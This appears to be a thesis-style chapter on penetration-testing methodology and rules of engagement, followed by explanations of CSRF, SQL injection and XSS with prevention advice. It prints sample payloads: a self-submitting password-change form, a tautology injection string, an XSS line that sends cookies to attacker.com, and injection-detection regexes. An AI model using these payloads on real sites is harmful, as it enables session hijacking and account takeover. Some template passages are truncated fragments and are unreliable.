3.3 Roles and Responsibilities of Penetration testers A Security penetration test is an activity in which a test team (hereafter referred to as Pen Tester) attempts to circumvent the security processes and controls of a computer system. Posing as external unauthorized intruders, the test team attempts to obtain privileged access, extract information, and demonstrate the ability to manipulate the target computer in unauthorized ways if it had happened outside the scope of the test. Due to the sensitive nature of the testing, specific rules of engagement are necessary to ensure that testing is performed in a manner that minimizes impact on operations while maximizing the usefulness of the test results. This document will provide guidance and formal documentation for the planning, approval, execution and reporting of external penetration testing.

Roles and Responsibilities


Director of Information Security shall: a. Be responsible for coordination of the penetration test activities and schedule and notify management of planned activities. Pen Test Point of Contact (POC) shall: a. Be responsible for the penetration test team and be the primary interface with the Director of Information Security for all penetration test activities. b. Develop the documentation and plans for the penetration test c. Identify and assign roles to the Pen Testers team, identify major milestones for the tasks of the Testers team, identify estimated dates upon which the major milestones will be completed, and indicate the critical path. d. Identify the steps that will be taken to protect the Test Plan, results and final deliverables. e. Coordinate the Information Security Penetration test with Director of Information Security. f. Assure that all pertinent reports, logs, test results, working papers and data related to the penetration tests are being generated and maintained, and are being store appropriately.

Procedure: The Pen Test POC will be the individual responsible for coordination of the penetration test activities and schedules, and notify management of planned activities. The Pen Tester POC will be responsible for the penetration test team and be the primary interface with the Pent Test POC for all penetration test activities. The Pen Tester shall develop the documentation and plans for the penetration test (See Appendices A and B) for the Penetration Test Plan Template). As part of this effort, the Pen Tester shall identify and assign roles to the Pen Testers team, identify major milestones for the tasks of the team, identify estimated dates upon which the major milestones will be completed, and indicate the critical path. The Pen Tester shall also identify the steps that will be taken to protect the Test Plan, results, and final deliverables. Conducting the Penetration Testing the Following task shall be performed by the Pen Tester for sites tested: a. Introductory Briefing a. Introduce key players b. Provide overview of Pen Tester capabilities c. Explain objectives of the penetration test d. Review resources, logistics and schedule requirements

e. Schedule technical and administrative face to face meetings b. Executive In-Briefing a. Introduce Pen Tester and key penetration testing staff b. Review objectives of the penetration test c. Review selected target systems d. Review plan and schedule for activities e. Address issues and concerns f. The Penetration Testing Plan and Rules of Engagement shall be signed by all parties prior to the start of testing activities. c. For External Penetration Testing a. Plan and schedule b. Conduct penetration testing with team (reconnaissance, exploitation of vulnerabilities, intrusion, compromise, analysis and recommendations.

d. Analysis of Data and Findings (off-site) a. Correlate data and findings from discoveries and reviews b. Analyze results from penetration testing c. Compare requirements with industry standards d. Document findings and prioritize recommended corrective actions with references to industry standards and requirements e. Provide briefing of findings, recommendations, and associated impacts, to Director of Information Security and the Assistant Vice President of Information Security and Special Projects e. Completion-Briefing a. Summarize findings b. Present final reports c. Discuss external penetration testing results d. Discuss evaluation of test sites IT security program and management structure. e. Discuss overall recommendations The Pen Tester shall remove all data related to the IT Security Penetration test for each site from the Pen Testers computer(s) by a method approved by the UC Information Security Director. All documents, data logs/files, test results and working papers generated by the Pen Tester for the IT Security Penetration test at each site shall not be retained by the Pen Tester.

3. Planning Penetration Test Plan Template 4. Approval

5. Execution Initial reconnaissance Build up an understanding of the company or organization. This will include interrogating public domain sources such as whois records, finding IP ranges, ISPs, contact names, DNS records, website crawling etc. Service determination The collection of IP addresses enables the investigation of available services. Scans for known vulnerabilities can also be performed using tools such as Nessus or ISS. If firewalls are found, attempts will be made to determine the firewall type. Note that most attacks are not against firewalls, rather through the firewalls at the servers behind (see my previous article on Web application security, (Network Security, August edition). Enumeration The operating system and applications are identified. Banner grabbing, IP fingerprinting, mail bouncing should reveal servers. Usernames, exports, shares etc. are also determined if possible. Gain access Once the testers have more knowledge on the systems, relevant vulnerability information will be researched or new vulnerabilities found in order to (hopefully) give some level of access to the systems. Privilege escalation If an initial foothold can be gained on any of the systems being tested, the next step will be to gain as much privilege as possible i.e. NT Administrator or UNIX root privileges. 6. Reporting summarized findings.

7. External Penetration Report Template Introduction Date carried out Testing Team details 1. Name 2. Contact Nos. 3. Relevant Experience if required. Network Details 1. Peer to Peer, Client-Server, Domain Model, Active Directory integrated 2. Number of Servers and workstations 3. Operating System Details 4. Major Software Applications 5. Hardware configuration and setup 6. Interconnectivity and by what means i.e. T1, Satellite, Wide Area Network, Lease Line Dial up etc. 7. Encryption/ VPN's utilized etc. 8. Role of the network or system Scope of test 1. Constraints and limitations imposed on the team i.e. Out of scope items, hardware, IP addresses. 2. Constraints, limitations or problems encountered by the team during the actual test 3. Purpose of Test curity assurance for the Code of Connection 4. Type of Test

5. Test Type

-Box twork and has been supplied with network diagrams, hardware, operating system and application details etc, prior to a test being carried out. This does not equate to a truly blind test but can speed up the process a great deal and leads to a more accurate results being obtained. The amount of prior knowledge leads to a test targeting specific operating systems, applications and network devices that reside on the network rather than spending time enumerating what could possibly be on the network. This type of test equates to a situation whereby an attacker may have complete knowledge of the internal network. -Box web based test is to be carried out and only the details of a website URL or IP address is supplied to the testing team. It would be their role to attempt to break into the company website/ network. This would equate to an external attack carried out by a malicious hacker. -Box testing team would simulate an attack that could be carried out by a disgruntled, disaffected staff member. The testing team would be supplied with appropriate user level privileges and a user account and access permitted to the internal network by relaxation of specific security policies present on the network i.e. port level security. 1. Executive Summary (Brief and Non-technical)

oftware failing - problem area

- problem area

- problem area Exploited - problem area

- problem area

3.4 Proposed work


Penetration testing is one of the most oldest methods for assessing the security of a computer system. In the early 1970's, the Deptt. of Defense used this method to demonstrate the security weaknesses in computer systems and to initiate the development of programs to create more secure systems. Penetration testing is increasingly used by organizations to assure the security of Information systems and services, so that security weaknesses can be fixed before they get exposed. But when the Penetration test is performed without a well planned and professional approach it can result to what it is supposed to prevent from. In order to protect company data, companies often take measures to guarantee the availability, confidentiality and integrity of data or to ensure access for authorized persons only. These measures include security concepts, authorization concepts and firewall systems. However, establishing these kinds of security systems is no guarantee that the legal requirements are met. Rather, the systems compliance with the legal requirements and stipulations must be checked for each individual case. Penetration tests are a suitable means of verifying the effectiveness of such measures in certain areas. The objective of the Penetration Testing service is to identify and report on security vulnerabilities to allow the Company to close the issues in a planned manner, thus significantly raising the level of their security protection. The Company understands that Internet security is a continually growing and changing field and that testing penetration testers does not mean that the Companys site is secure from every form of attack. There is no such thing as 100% security testing, and for example it is never possible to test for vulnerabilities in software or systems that are not known at the time of testing or the mathematically complete set of all possible inputs/outputs for each software component in use. Further security breaches can and frequently do come from internal sources whose access is not a function of system configuration and/or external access security issues. There are many methodologies you can choose from, there is no such thing as the right methodology. Every penetration tester has his/her own approach to testing, but each one uses a methodology, in order for the test to be carried out professionally, effective and less time consuming. If a tester has no methodology to use in his test, then that might result to: - incomplete testing (e.g. the tester might not fulfill all of the requirements) - time consuming (e.g. a lot of time will be spent to re-order your test to being-end format) - waste of effort (e.g. the testers might end up testing the same thing) - ineffective testing (e.g. the results and the reporting might not suit the requirements of the client)

Methodology is a map using which you will reach your final destination (end of test) and without a methodology the testers might get lost (reach the abovementioned results).

Proposed methodology
Proposed methodology model

While there are several available methodologies for you to choose from, each penetration tester must have their own methodology planned and ready for most effectiveness and to present to the client. In the prosposed methodology planning, there are 3 main figures that must be fully understood and followed: 1. Information. Information gathering is essentially using the Internet to find all the information you can about the target (company and/or person) using both technical (DNS/WHOIS) and nontechnical (search engines, news groups, mailing lists etc) methods. Whilst conducting information gathering, it is important to be as imaginative as possible. Attempt to explore every possible avenue to gain more understanding of your target and its resources. Anything you can get hold of during this stage of testing is useful: company brochures, business cards, leaflets, newspaper adverts, internal paperwork, and etc. Information gathering does not require that the assessor establishes contact with the target system. Information is collected (mainly) from public sources on the Internet and organizations that hold public information (e.g. tax agencies, libraries, etc.) Information gathering section of the penetration test is important for the penetration tester. Assessments are generally limited in time and resources. Therefore, it is critical to identify points that will be most likely vulnerable, and to focus on them. Even the best tools are useless if not used appropriately and in the right place and time. Thats the reason why experienced testers invest an important amount of time in information gathering. [4] There are commonly 2 types of penetration testing: When the information about the organization is Closed (Black box) - the pen-tester performs the attack with no prior knowledge of the infrastructure, defence mechanisms and

communication channels of the target organization. Black box test is a simulation of an unsystematic attack by weekend or wannabe hackers (script kiddies). And when the information is Shared (White box) - the pen-tester performs the attack with full knowledge of the infrastructure, defence mechanisms and communication channels of the target organization. White box test is a simulation of a systematic attack by well prepared outside attackers with insider contacts or insiders with largely unlimited access and privileges. If the penetration testers are using the Black Box approach, then Information gathering must be planned out, because information gathering is one of the most important processes in penetration testing and its one of first phases in security assessment and is focused on collecting as much information as possible about a target application. This task can be carried out in many different ways: by using public tools (search engines), scanners, sending simple HTTP requests, or specially crafted requests, it is possible to force the application to leak information, e.g., disclosing error messages or revealing the versions and technologies used. If the penetration testers are using the White Box approach, then the tester should target the information gathering procedure based on the scope (e.g. the clinet might give all the required information, and might not want the testers to search for other information) Basically there are 4 phases to information gathering: Phase 1. The first step in information gathering is - network survey. A network survey is like an introduction to the system that is tested. By doing that, you will have a network map, using which you will find the number of reachable systems to be tested without exceeding the legal limits of what you may test. But usually more hosts are detected during the testing, so they should be properly added to the network map. The results that the tester might get using network surveying are: - Domain Names - Server Names - IP Addresses - Network Map - ISP / ASP information - System and Service Owners Network surveying can be done using TTL modulation(traceroute), and record route (e.g. ping -R), although classical 'sniffing' is sometimes as effective method Phase 2. 2nd phase is the OS Identification (sometimes referred as TCP/IP stack fingerprinting). The determination of a remote OS type by comparison of variations in OS TCP/IP stack implementation behavior. In other words, it is active probing of a system for responses that can distinguish its operating system and version level. The results are: - OS Type - System Type - Internal system network addressing The best known method for OS identification is using nmap Phase 3. Next step is port scanning Port scanning is the invasive probing of system ports on the transport and network level. Included here is also the validation of system reception to tunneled, encapsulated, or routing protocols. Testing for different protocols will depend on the system type and services it offers. Each Internet enabled system has 65,536 TCP and UDP possible ports (incl. Port 0). However, it is not always necessary to test every port for every system. This is left to the discretion of the test team. Port numbers that are important for testing according to the service are listed with the task. Additional port numbers for scanning should be taken from the Consensus Intrusion Database Project Site. The results that the tester might get using Port scanning are:

- List of all Open, closed or filtered ports - IP addresses of live systems - Internal system network addressing - List of discovered tunneled and encapsulated protocols - List of discovered routing protocols supported Methods include SYN and FIN scanning, and variations thereof e.g. fragmentation scanning Phase 4. Services identification. This is the active examination of the application listening behind the service. In certain cases more than one application exists behind a service where one application is the listener and the others are considered components of the listening application. A good example of this is PERL installed for use in a Web application. In that case the listening service is the HTTP daemon and the component is PERL. The results of service identification are: - Service Types - Service Application Type and Patch Level - Network Map The methods in service identification are same as in Port scanning There are two ways using which you can perform information gathering: 1. 1st method of information gathering is to perform information gathering techniques with a 'one to one' or 'one to many' model; i.e. a tester performs techniques in a linear way against either one target host or a logical grouping of target hosts (e.g. a subnet). This method is used to achieve immediacy of the result and is often optimized for speed, and often executed in parallel (e.g. nmap). 2. Another method is to perform information gathering using a 'many to one' or 'many to many' model. The tester utilizes multiple hosts to execute information gathering techniques in a random, rate-limited, and in non-linear way. This method is used to achieve stealth. (Distributed information gathering) 2. Team. Penetration testing is most effective if its a team of professional, which all have their roles and responsibilities appointed and all know what he/she must do and how to do it. In penetration testing, as in any sphere, each team member must know his/her part of the team, and should follow the affixed procedure (e.g. network administrator, should not be searching for vulnerabilities through the web-site) in order for the test to be quick, efficient and less time consuming. (e.g. security consultant is responsible to make the report clear and understandable, in order for the technicians to be more focused on testing rather than reporting) 3. Tools. And the last most important part of the test is the toolkit. Each penetration testers have their toolset to perform a penetration test. These tools are usually chosen in order to make their work most effective (a test cannot be effective if the owner of the system assigns tools, which the testers are not familiar with). There are many tools available, and many of them are available for free usage, but the penetration testers must have excellent usage at least with some of them, rather that know most of them on an average level. It is also vital for the testers to choose their toolkits wisely, since this not only one area to perform a penetration test in (software development, network). For example, network vulnerability scanners that try to evade detection by IDS and IPS devices would normally not be useful for software development. So the testers should choose the toolkit with features that are suitable for them (e.g. Configurability, Extensibility). 4. Policy 1. The Company must provide the penetration tester with certain required information regarding the scope and range of the tests and all information provided must be true and accurate. This is done for the purpose of:

- Accuracy; e. g. with the defined scope the test will be pin-pointed, and the tester will have a test-map which to follow throughout the test - Confidentiality; e. g. with the defined ranges of the test, the tester will not be testing and/or acquiring the information which is confidential even for the tester - Resource saving; e. g. with the defined scope and range, the tester will not be spending time and human resources on testing non-required targets 2. Penetration tester must gather all the information required for the testing only within the defined boundaries of the test and all of this information must be reported completely at the end of the test. Purpose: - Privacy; e. g. all of the gathered information must be reported so that there will be no information leaks 3. The Company and the tester must agree upon a timing table of the tests Purpose: - Safety; e. g. so that tests will be carried in a non-harmful for them period (a DoS attack will not be carried out in a busy network period) International Journal of of Grid and Distributed Computing 4.1 The penetration tester must be held responsible for all the damage that occurs to the reason of testing. The penalty for the damage (data loss, equipment destruction) should be agreed upon and stated in the contract prior to the testing. 4.2 The damage that has occurred not to the fault of the test is the responsibility of the Company There are also cases that damage is occurred which is not the responsibility of the tester, for example the DoS attack was carried out, which led to financial loss (because of no service), but the timing of the DoS attack was not agreed upon. This is why timing is important (refer to policy rule #3) 5. The Company and the penetration tester must keep all the information of the test, including the contract as confidential. No information about contract, terms, fees should be released by either party. Information about the Companys business or computer systems or security situation that the tester obtains during the course/and after the completion of the test must not be released to any third party without prior written approval. 6. The provider may assign or sub-contract all or any part of its rights and obligations under a contract to third parties without the Companys prior written consent. Some penetration testing companies assign different stages of testing to third-parties, this does not have to be approved by the client. The penetration tester utilizes a team approach employing experts to test different security aspects. All sub-contractors employed by the penetration tester shall, however, be bound by the terms and conditions of a same contract as between the Company and the penetration tester. 7.1 The penetration tester and the Company may from time to time impart to each other certain confidential information relating to each others business including specific documentation. There are times when tester might need additional information (contacts, accounts), and/or the client might provide additional information (e. g. passwords, user accounts) during the testing. All of this information should keep confidentiality as information given prior to the test, or acquired during the testing (refer to policy rule #5) 7.2 Each party must use such confidential information only for the purposes of the test and that it must not be disclosed directly or indirectly to any third party. 8. After the completion of the testing and reporting the provider has no rights to

the information or the data of the Company, unless approved by the Company. During the testing, the penetration is granted access, and/or acquires access to confidential information. After the completion of the test, the tester no longer has right to the information, or any further testing, unless the client of the test approves. 9. The penetration tester holds no responsibility for the loss and/or damage that is occurred in case if a real attack is occurred during the testing period. If a real attack occurred during the testing period, the tester holds no responsibility to that attack, however if that attack occurred to the result of information leak from the tester, then the tester is responsible for the damage.

WEB APPLICATION VULNERABILITY ASSESSMENT AND PREVENTING TECHNIQUES


A Vulnerability Assessment (VA) is the process of identifying, quantifying, and prioritizing the vulnerabilities (security holes) in a system. VA has many things in common with risk assessment. The World Wide Web (WWW) is delivering a broad range of sophisticated web applications for business, net banking, news feeds, shopping etc.,However, many web applications go through fast development phases with extremely short time, making it difficult to eliminate vulnerabilities. Web applications provide access to increasing amounts of information, some of which is confidential. From an application perspective, vulnerability identification is absolutely critical and often over looked as a source of risk. Unverified parameters, broken access controls, and buffer overflows are just a few types of the many potential security vulnerabilities found in complex business applications. Here we analyse the design of web application security assessment mechanisms in order to identify poor coding practices. Web applications vulnerable to attacks such as SQL injection and Cross-Site Scripting, Buffer Over Flows, Cross Site Request Forgery, Security Misconfiguration etc., we describe the use of a number of software testing techniques (including dynamic analysis, black-box testing, fault injection, and behavior monitoring), and suggest mechanisms for applying these techniques to web applications. In computer security, vulnerability is a weakness which allows an attacker to reduce a system's information assurance. The Web Application Vulnerability Assessment (WAVA) is a method to test that assesses the security of interactive applications using web technologies such as e-banking, news and e-commerce web applications. For the attack scenarios the organization wants to cover the Web Application Vulnerability Assessment and it will: Identify and analysis vulnerabilities Infrastructure, application and operational level; Identify root causes of weaknesses; Determine levels of business risk Web Application Vulnerability Assessment, taking into account the full range of layers ranging from people and organization down to the physical environment when is conducting the Vulnerability Assessment (VA). Depending on the scope and purpose of vulnerability assessment, it makes sense to start looking at the web security of crucial applications. Below is the list of Vulnerabilities reported by the web applications in the recent years.

Vulnerability Assessment: The First Steps There are a number of reasons organizations may need to conduct a vulnerability assessment. It could be simply to conduct a check-up regarding overall web security risk posture. But if organization has more than a handful of applications and a number of servers, a vulnerability assessment of such a large scope could be overwhelming. The first thing needs to decide is what applications need to be assessed, and why. It could be part of PCI DSS requirements or the scope could be the web security of a single,ready-to-be deployed application etc. Web Application Vulnerability Types Detecting web application vulnerabilities, we choose the following: 1. Cross-Site Request Forgery (CSRF), 2. SQL injection (SQLI) 3.Cross-site scripting (XSS) as our primary vulnerability detection targets for two reasons: a) They exist in many Web Applications, and b) Their avoidance and detection are still considered difficult. Here will give a brief description of vulnerability followed by our proposed detection and prevention models.

CROSS SITE REQUEST FORGERY (CSRF)


CSRF is a kind of attack which forces an end user to execute unwanted or unknown actions on a web application in which he/she is currently authenticated. With a little help of social engineering like sending a link via email/chat, an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, and Hostile Linking. Cross-Site Request Forgery (CSRF) attacks are considered useful if the attacker knows the target is authenticated to a web based system. They only work if the target is logged into the system, and therefore have a small attack footprint. Other logical weaknesses also need to be present such as no transaction authorization required by the user. In effect CSRF attacks are used by an attacker to make a target system perform a function (like Funds Transfer, Form submission etc.) via the targets browser without the knowledge of the target user, at least until the unauthorized function has been committed. A primary target is the exploitation of ease of use features on web applications (One-click purchase).

CSRF Detection
Web application offers messaging between users. Upon login it sets a large, unpredictable session ID cookie which is used to authenticate further requests by users. One of the features of website is that users can send each other links inside their text messages. It uses HTTPS to keep messages, credentials, and session identifiers secret from network eavesdroppers. An incoming messages frame is displayed to users who have logged in. This frame uses JavaScript or a refresh tag to execute the Check for new messages action every 10 seconds on behalf of the user. New

messages appear in this frame, and include the name of the sender and the text of the message. Text that is formatted as an HTTP or HTTPS URL is automatically converted into a link. The Send a message action takes two parameters: recipient (a user name or all), and the message itself which is a short string. To determine if this application is susceptible to CSRF, examine the Send a message action (although the Logout action is also sensitive and might be targeted by attackers for exploitation). When I do this, we find the following simple HTML form is submitted to send messages: <form action="GoatChatMessageSender" method="GET"> <INPUT type="radio value="Bob" name="Destination">Bob<BR> <INPUT type="radio" name="Destination" value="Alice">Alice<BR> <INPUT type="radio" name="Destination" value="Malory">Malory<BR> <INPUT type="radio" name="Destination" value="All">All<BR> Message: <input type="text" name="message" value="" /> <br><input type="submit" name="Send" value="Send Message" /> </form> Form for sending messages: Here is what it looks like in its frame: From looking at this form we can figure out that when users wish to send the message Hi Alice to Alice, the following URL will be fetched when the user clicks Send message. Hidden Form Based CSRF Exploit The exploitation of a system which allows password changes, but does not require the user old password. In this example the target servlet requires an HTTP POST, and the attacker creates a selfsubmitting form to full fill this requirement. Note that this exploit is not as reliable as the image based request. Because the users browser (or at least the tiny frame this exploit is placed in) is actually directed to the targeted site. Users with disabled browser scripting wont be exploited, and depending on the users browser and configuration form submissions to other sites may result in a security popup box. <HTML> <BODY> <form method="POST" id="evil" name="evil" action="https: //www.yahoo.com/ VictimApp/PasswordChange"> <input type=hidden name="newpass" value="badguy"> </form> <script>document.evil.submit()</script> </BODY> </HTML> Even if scripting is disabled however a close this window link that is actually a submit button may trick a user into submitting the form on the attackers behalf.

How to prevent CSRF


Preventing CSRF requires the inclusion of a unpredictable token as part of each transaction. Such tokens should at a minimum be unique per user session, but can also be unique per request. 1. The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure. 2. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs the risk that the URL will be exposed to an attacker, thus compromising the secret token.

SQL INJECTION (SQLI)


For web applications, one common class of security problems is the so-called SQL command injection attacks. We use a simple example to illustrate the problem. Many applications include code that looks like the following: String query = "SELECT * FROM employee WHERE name = '" + name + "'"; The user supplies the value of the name variable, and if the user inputs \John" (an expected value), then the query variable contains the string: "SELECT * FROM employee WHERE name = 'John'". A malicious user, however, can input \John' or 1=1-," which results in the following query being constructed: "SELECT * FROM employee WHERE name = 'John' OR 1=1--'". The \--" is the single-line comment operator supported by many relational database servers, including MS SQL Server, IBM DB2, Oracle, PostgreSQL, and MySQL. In this way, the attacker can supply arbitrary code to be executed by the server and exploit the vulnerability. Although the source language, e.g., Java, may have a strong type system, it provides no guarantee about the dynamically generated SQL queries. Certainly direct string manipulation is a low-level programming model, but it is still widely used, and command injections do pose a serious threat both to legacy systems and to new code. A recent web-search easily revealed several sites susceptible to such attacks. At the heart of SQL injections is an input validation problem, i.e. to accept only certain expected inputs. Proper input validation turns out to be very difficult to achieve injection attack. Several techniques to address it, and we give an overview here. At a low level, input can either be altered, so that inputs are rejected, or altered with the design of making all inputs are good. One suggested technique is to enumerate the strings that the programmer believes are necessary for an injection attack but not for normal use. If any of those strings appear as substrings in the input, either the input can be rejected, or they can be cut out, leaving usually nonsense or harmless code. Another common practice is to restrict the length of input strings. More generally, inputs can be altered by matching them against a regular expression pattern and rejecting them if they do not match. An alternative is to alter input by adding slashes in front of quotes in order to prevent the quotes that surround literals from being closed within the input. Common ways to do this are with PHP's add slashes function and PHP's magic quotes setting. Recent research efforts provide ways of systematically specifying and enforcing constraints on user inputs. Power- Forms provides a domain specific language to generate both client-side and server-side checks of constraints expressed as regular expressions. One recent project proposes a type system to ensure that all data is \trusted"; that type system considers input to be trusted once it has passed through a Perl's \tainted mode" has a similar goal, but it operates at runtime. The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates un-trusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries. Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Manual penetration testers can confirm these issues by crafting exploits that confirm the vulnerability.

Checking Access Control Policies


Access control policies (ACP) grant entities permissions on resources. Our analysis checks the generated queries against some given access control policy for the database. DBMSs usually use role-based access control (RBAC), in which the entities are roles (e.g., administrator, manager, employee, customer, etc.) and users act as one of these roles when accessing the database. The active role for each hotspot is an input to our analysis. The permissions include, for example, SELECT, INSERT, UPDATE, DELETE and DROP etc. The resources are database tables and columns. As we know for each column transition, all contexts (e.g., SELECT, INSERT, etc.) in which it may appear in the generated queries. We use this to discover access control violations. For example, if the role customer does not have the

INSERT permission on table, even if table is mentioned in a SELECT sub-query of an INSERT statement, we will discover and flag the violation.

Detecting SQL Injections


SQL Injection refers to the technique of inserting SQL meta-characters and commands into web-based input fields in order to manipulate the execution of the back-end SQL queries. An important point to keep in mind while choosing regular expression(s) for detecting SQL Injection attacks is that an attacker can inject SQL into input taken from a form, as well as through the fields of a cookie. Input validation logic should consider each and every type of input that originates from the user -- be it form fields or cookie information -- as suspect. Also if discover too many alerts coming in from a signature that looks out for a single-quote or a semi-colon, it just might be that one or more of these characters are valid inputs in cookies created by your Web application. Therefore, you will need to evaluate each of these signatures for your particular Web application. As mentioned earlier, a trivial regular expression to detect SQL injection attacks is to watch out for SQL specific meta-characters such as the single-quote (') or the doubledash (--). In order to detect these characters and their hex equivalents, the following regular expression may be used: /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix Regex for typical SQL Injection attack: /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix Explanation: \w* - zero or more alphanumeric or underscore characters (\%27)|\' - the ubiquitous single-quote or its hex equivalent (\%6F)|o|(\%4F))((\%72)|r|(\%52) - the word 'or' with various combinations of its upper and lower case hex equivalents. The use of the 'union' SQL query is also common in SQL Injection attacks against a variety of databases. If the earlier regular expression that just detects the single-quote or other SQL meta characters results in too many false positives, you could further modify the query to specifically check for the single-quote and the keyword 'union'. This can also be further extended to other SQL keywords such as 'select', 'insert', 'update', 'delete', etc. The second main check we perform on the generated SQL queries is to verify the absence of tautologies from all WHERE clauses. Generally, if an honest user wants to return all tuples (rows) for a query, the query will not have a WHERE clause. In the context of web applications, a tautology in a WHERE clause is an almost-certain sign of an attack, in which the attacker attempts to circumvent limitations on what web users are allowed to do.

How to Prevent SQL Injection


Preventing injection requires keeping un-trusted data separate from commands and queries.The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Beware of APIs, such as stored procedures that appear parameterized, but may still allow injection under the hood. If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. Positive or white list input validation with appropriate canonicalization also helps protect against injection, but is not a complete defense as many applications require special characters in their input.

Preventing SQL Injection Attacks


With dotDefender(tool) web application firewall you can avoid SQL injection attacks because dotDefender inspects your HTTP traffic and determines if your web site suffers from SQL Injection or other attacks stopping identity theft and preventing data leaks from web applications.

Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against SQL Injection attacks, cross-site scripting, website defacement and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:

Enterprise-class security against known and emerging hacking attacks Solutions for Hosting, Enterprise and SMB/SME Supports multiple platforms and technologies - IIS, Apache, Cloud ... Central Management console for easy control over multiple dotDefender installations Open API for integration with management platforms and other applications

CROSS SITE SSCRIPTING (XSS)


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls (AC) such as the same origin policy. Cross site scripting web application vulnerability which allows attackers to bypass client side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page-content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are a special case of code injection. There are three known types of XSS flaws: 1)Persistent (or stored) XSS, 2) Non-persistent (or reflected) XSS and 3) DOM based XSS. When hackers are using website to attack customers, you are probably dealing with a Cross Site Scripting attack. Hackers can inject JavaScript (a routinely used scripting solution that gets executed on the users web browser) which is normally used for legitimate functionality on websites, but in the hands of a hacker can be used for malicious purposes. Here are but a few examples: Steal cookies which can then be used to impersonate your customer and have access to their data and privileges. This is also known as Session Hijacking; Redirect the user to another website of their choosing. Maybe one that may be quite offensive, or one that attempts to install malware onto users computer; Display alternate content on your own website; Do ports scan of the customers internal network, which may lead to a full intrusion attempt. As with SQL injection, cross-site scripting is also associated with undesired data flow. To illuminate the basic concept, offer the following scenario. A web site for selling computer-related merchandise holds a public on-line forum for discussing the newest computer products. Messages posted by users are submitted to a CGI program that inserts them into the Web applications database. When a user sends a request to view posted messages, the CGI program retrieves them from the database, generates a response page, and sends the page to the browser. In this scenario, a hacker can post messages containing malicious scripts into the forum database. When other users view the posts, the malicious scripts are delivered on behalf of the web application. Browsers enforce a same origin policy that limits scripts to accessing only those cookies that belong to the server from which the scripts were delivered. In this scenario, even though the executed script was written by a

malicious hacker, it was delivered to the browser on behalf of the Web application. Such scripts can therefore be used to read the Web applications cookies and to break through its security mechanisms.

Persistent (or stored) XSS


The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.

Non-persistent (or reflected) XSS


The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request. Example of non-persistent XSS Non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in.

DOM-based XSS
DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML contents which is called the Document Object Model (DOM). JavaScript programs manipulate the state of a web page and populate it with dynamically-computed data primarily by acting upon the DOM. A typical example is a piece of JavaScript accessing and extracting data from the URL via the location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping, entirely on client side. Example Attack Scenario: The application uses un-trusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXTvalue='" + request.getParameter("CC") + "'>"; The attacker modifies the CC parameter in their browser to: '><script>document.location='http://www.attacker.com/cgibin/ cookie.cgi?'%20+document.cookie</script>. This causes the victims session ID to be sent to the attackers website, allowing the attacker to hijack the users current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ.

Cross-Site Scripting (XSS) detection


Indications of cross-site scripting are detected during the reverse engineering phase, when a crawler performs a complete scan of every page within a web application. A crawler with the functions of a full browser results in the execution of dynamic content on every crawled page (e.g., JavaScript, ActiveX controls, Java Applets, and Flash scripts). Any malicious script that has been injected into a web application via cross-site scripting will attack the crawler in the same manner that it attacks a browser, We used the detours package to create a SEE that intercepts system calls made by a crawler. Calls with malicious parameters are rejected. The SEE operates according to an anomaly detection model. During the initial run, it triggers a learning mode. It crawls through predefined links that are the least likely to contain malicious code that induces abnormal behaviour. Wellknown

and trusted pages that contain ActiveX controls, Java Applets, Flash scripts, and JavaScript are carefully chosen as crawl targets. As they are crawled, normal behavior is studied and recorded. Our results reveal that during start-up, Microsoft Internet Explorer (IE) 1. Locates temporary directories. 2. Writes temporary data into registry. 3. Loads favourite links and history lists. 4. Loads the required DLL and font files. 5. Creates named pipes for internal communication. During page retrieval and rendering, IE 1. Checks registry settings. 2. Writes files to the users local cache. 3. Loads a cookie index if a page contains cookies. 4. Loads corresponding plug-in executables if a page contains plug-in scripts.

XSS Exploit (attack) scenarios


